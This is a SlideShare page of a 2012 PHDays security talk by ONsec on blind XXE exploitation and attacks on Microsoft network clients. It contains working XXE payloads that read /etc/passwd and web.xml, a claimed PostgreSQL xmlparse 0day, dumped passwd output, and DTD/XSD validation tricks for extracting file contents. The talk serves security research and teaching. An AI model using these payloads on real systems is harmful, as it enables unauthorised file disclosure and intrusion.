ONsec PHDays 2012 XXE incapsulated report


Published on

PHDays report. Attacks on MS clients and blind XXE exploitatio encapsulated report. D0znpp. ONsec

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

ONsec PHDays 2012 XXE incapsulated report

  1. 1. Attacks against Microsoftnetwork web clientsPHDays, Russia, Moscow, 31/05/2012
  2. 2. Author bio@d0znpp, d0znpp@onsec.ru•Have engaged in research in the field of webapplication security (since 2004);•Founder and security expert of ONseccompany (since 2009);•Now days: development of self-learningsystems for the detection of attacks on webapplications and heuristic analysis.
  3. 3. MS network under attack• Trusted domain• Same Origin Policy on trusted domain• Local network area• Security policy• Bypass “no-proxy for local addresses”• Profit
  4. 4. Blind XXE exploitationPHDays, Russia, Moscow, 31/05/2012
  5. 5. Good morning. Wake up, 0dayPostgreSQL all versions (8.4.11 debian4.4.5-8 tested)xmlparse(document ‘<!DOCTYPE c [ <!ENTITY a SYSTEM"">]><c>&a</c>);
  6. 6. Good morning. Wake up, 0dayPostgreSQL all versions (8.4.11 debian4.4.5-8 tested)No way to read content from entity, but…ERROR: invalid XML documentПОДРОБНО: parser error : StartTag: invalid element name<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/x^ parser error : AttValue: " or expected <img src=http://seclog.ru/main/logo.php width=0 height=0/>
  7. 7. XXE basicsParser bug (feature)•To read local files•To make DoS (by reading /dev/zero loops)<?xml encoding=utf-8 ?><!DOCTYPE a [<!ENTITY e SYSTEM/etc/paswd> ]><a>&e;</a>
  8. 8. XXE applications• Local files• Internel network resources• Port scan (• MS Windows network resources (adC$)• Wrappers (ldap:// in perl, expect:// ssh2:// etc.)
  9. 9. Classic XXE vuln• Based on web application error messages, such as:“Unknown language DATA”“Login DATA are not valid”“Password for user DATA does not match”• Could not provide reading of files with non- valid characters, such as 0x02 < > etc.
  10. 10. Vuln which won a “Month of Yandexbugs hunting“ contest$ ./xxe-direct.pl --file=“/etc/passwd”<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"xmlns:namesp2="http://namespaces.soaplite.com/perl"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"xmlns:namesp84="http://xml.apache.org/xml-soap"xmlns:xsd="http://www.w3.org/2001/XMLSchema" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><SOAP-ENV:Fault><faultcode xsi:type="xsd:string">SOAP-ENV:511</faultcode><faultstring xsi:type="xsd:string">Unknownlanguage</faultstring><detail xsi:type="xsd:string">Unknown languageroot:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/sh
  11. 11. What is wrong?• Webapp may not display error messages• You may want to get XML file contents in Java Interesting XMLs: •web.xml •tomcat-users.xml •jetty.xml •http.conf (malformed)
  12. 12. PHP way to read anything• PHP wrapper provide a filter functionalphp://filter/convert.base64- encode/resource=web.xml• Then need to display an error messages too
  13. 13. What is blind?• Use DTD and XSD validations• Get a validation result (status or errors)• Use bruteforce, regexp, binary search and error message information (error-based) to read external XML structure and data
  14. 14. DTD based attack formulaXMLinp = DTDint + XMLint + XMLextV(XMLinp,DTDint)=V(XMLint,DTDint) && V(XMLext,DTDint)XMLinp – input XML streamDTDint – internal DTD schemaXMLint - internal XML structureXMLext – external XML (XML to read)V(xml,schema) – validation function, which returneda validation status (error message or boolean)
  15. 15. DTD based attack: from idea toschema <?xml version=“1.0” ?><?xml version=“1.0”?> <!ENTITY ext SYSTEM “web.xml”><secret> <!ELEMENT root (secret+)><any> <!ELEMENT secret (any+)>data <!ELEMENT any (#PCDATA)></any> XML validation error</secret> <root> &ext; <secret><any>data</any></secret> </root> Web.xml Input.xml
  16. 16. Example #1. Read attribute value<!ATTLIST key id (a|b) #REQUIRED ><key id=“secret”></key>Value "secret" for attribute id of mountain isnot among the enumerated set in //LibXMLAttribute "key" with value "secret" must havea value from the list "a b ". //Xerces
  17. 17. Example #2. Brute external XML tag<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(root+)>]><ext>&a;</ext> -- > OK<!ENTITY a SYSTEM "web.xml"><!ELEMENT ext(foobar+)>]><ext>&a;</ext> -- > Element ext content does not follow the DTD,expecting (root)+, got (CDATA ) //LibXML PHP
  18. 18. Example #3.Read external XML(Java)factory.setValidating(true);//SAXParserFactory orDocumentBuilderFactory<!DOCTYPE root [<!ELEMENT root (foo+)><!ENTITY a SYSTEM ’web.xml>]><root>&a;</root>Element type ”bar" must be declared.Where is “bar” tag? “Bar” in web.xml!
  19. 19. Problems of DTD based attacks• Example #3 doesn’t work in LibXML PHP ;(Only first tag name can be readed (Example #2) from DOM object in PHP (library’s bug).• DTD can’t be used to determine tag values (only tag names, document structure and attribute values)• Bruteforce required if errors are not displayed• Malformed XML such as http.conf can’t be readed
  20. 20. XSD based attack formulaXMLinp = DTDinp + XSDinp + XMLint + XMLextV(XMLinp,DTDinp,XSDinp) = V(XMLint,DTDinp,XSDinp) &&V(XMLext,DTDinp,XSDinp)XMLinp – input XML streamDTDinp – input DTD schemaXSDinp –input XSD schemaXMLint - internal XML structureXMLext – external XML (XML to read)V(xml,dtd,xsd) – validation function, which returned avalidation status (error message or boolean)
  21. 21. XSD based attack: from idea toschema <?xml version=“1.0” ?><?xml version=“1.0”?> <!ENTITY ext SYSTEM “web.xml”><secret> <root<any> xsi:noNamespaceSchemaLocation =data ”http://myhost/int.xsd”></any> XML validation error</secret> &ext; <secret><any>data</any></secret> </root> Web.xml Input.xml
  22. 22. Example #4. Read tag values (XSD)parser.setProperty("http://java.sun.com/xml/jaxp/properties/schemaLanguage","http://www.w3.org/2001/XMLSchema");//SAXParserFactory or DocumentBuilderFactory<!ENTITY ext SYSTEM “web.xml”><contactsxsi:noNamespaceSchemaLocation=”int.xsd”><xs:element name=”password" type="xs:int"/>cvc-datatype-valid.1.2.1: ’Secret is not a valid value for integer.cvc-type.3.1.3: The value ’Secret of element ’password is not valid.//Xerces
  23. 23. Binary search basics a-n? m-z? a-h? a-e? h-n?
  24. 24. Faster binary search• Phonetic chains• Probability with which one letter follows another one• Based of phonetics features of languages• Can be used to make text reading by binary search fasterhttp://exploit-db.com/papers/13969/
  25. 25. Example #5. Binary search for tagvalue (XSD)<xs:element name="password" type="PWD"/>…<xs:simpleType name=”PWD"> <xs:restriction base="xs:token"> <xs:pattern value=”[a-m]{1}[a-z]+"/> </xs:restriction></xs:simpleType>If first character of password tag value between “a”and “m” validation will true, else – false
  26. 26. And what about attacks withoutvalidation status?• Use something like time-based attacks!• XSD parser validate all tags even else some of them already not valid• Parser != Interpreter• What we can do in that case?
  27. 27. Example #6. 2blind attacks <xs:element name=”secret"> <xs:complexType> <xs:choice> <xs:group ref=”conditionGrp"/> <xs:group ref=”highloadGrp"/> </xs:choice> </xs:complexType> </xs:element> If value of secret tag approach to conditionGrp parser doesn’t execute regexp from highloadGrp. Then you should do highloadGrp regexp really difficult ;)
  28. 28. Problems of XSD based attacks• Internal XSD validation is rare in a wild• Only 4% of all webapps with XXE vulns make that*• Could not be used to read malformed XML, such as httpd.conf* By our stats from security audits since 2009
  29. 29. ???PHDays, Russia, Moscow,31/05/2012@d0znppd0znpp@onsec.ru